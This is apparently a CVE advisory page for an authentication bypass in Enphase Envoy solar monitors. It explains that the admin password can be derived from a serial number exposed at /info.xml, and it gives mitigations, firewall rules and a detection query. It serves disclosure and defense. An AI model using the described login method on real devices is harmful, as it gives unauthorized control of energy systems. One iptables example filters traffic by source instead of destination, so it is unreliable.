Login Sign Up

CVE-2020-25753

9.8 CRITICAL
Authentication Bypass

📋 TL;DR

Enphase Envoy solar monitoring devices have a default admin password set to the last 6 digits of the device serial number, which can be retrieved by unauthenticated users via the /info.xml endpoint. This allows attackers to gain administrative access to affected devices. All Enphase Envoy R3.x and D4.x devices running v3 software are vulnerable.

💻 Affected Systems

Products:
  • Enphase Envoy R3.x
  • Enphase Envoy D4.x
Versions: v3 software
Operating Systems: Embedded firmware
Default Config Vulnerable: ⚠️ Yes
Notes: Devices with default admin password unchanged are vulnerable. The serial number is publicly accessible via /info.xml endpoint.

📦 What is this software?

Envoy Firmware by Enphase

View all CVEs affecting Envoy Firmware →

Envoy Firmware by Enphase

View all CVEs affecting Envoy Firmware →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Full administrative control of solar monitoring systems, enabling manipulation of energy data, disruption of solar operations, or use as an entry point to internal networks.

🟠

Likely Case

Unauthorized access to solar monitoring data and potential manipulation of energy reporting metrics.

🟢

If Mitigated

Limited impact if strong network segmentation and access controls prevent external access to the devices.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Exploitation requires only retrieving the serial number from /info.xml and using the last 6 digits as admin password.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Not specified

Vendor Advisory: https://enphase.com/en-us/products-and-services/envoy-and-combiner

Restart Required: No

Instructions:

1. Access Envoy admin interface
2. Change default admin password to a strong, unique password
3. Disable unnecessary services/ports
4. Ensure device is not directly internet-accessible

🔧 Temporary Workarounds

Change Admin Password

all

Manually change the default admin password to a strong, unique password

Access web interface at http://[device-ip]/admin and change password

Restrict Network Access

linux

Block external access to Envoy devices using firewall rules

iptables -A INPUT -s [device-ip] -p tcp --dport 80 -j DROP
ufw deny from any to [device-ip] port 80

🧯 If You Can't Patch

  • Implement strict network segmentation to isolate Envoy devices from untrusted networks
  • Monitor for unauthorized access attempts and serial number retrieval from /info.xml endpoint

🔍 How to Verify

Check if Vulnerable:

Access http://[device-ip]/info.xml as unauthenticated user, extract serial number, try last 6 digits as admin password at http://[device-ip]/admin

Check Version:

Check device label or web interface footer for firmware version

Verify Fix Applied:

Attempt to access admin interface with old password (should fail) and verify new strong password works

📡 Detection & Monitoring

Log Indicators:

  • Multiple failed login attempts followed by successful admin login
  • Access to /info.xml endpoint from unauthorized sources

Network Indicators:

  • Unusual traffic patterns to Envoy admin interface
  • External IP addresses accessing /info.xml

SIEM Query:

source_ip=external AND (uri_path="/info.xml" OR uri_path="/admin")

📊 Metadata

CVE ID: CVE-2020-25753
CVSS v3 Score: 9.8 (CRITICAL)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Published: June 16, 2021
Last Updated: November 21, 2024

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON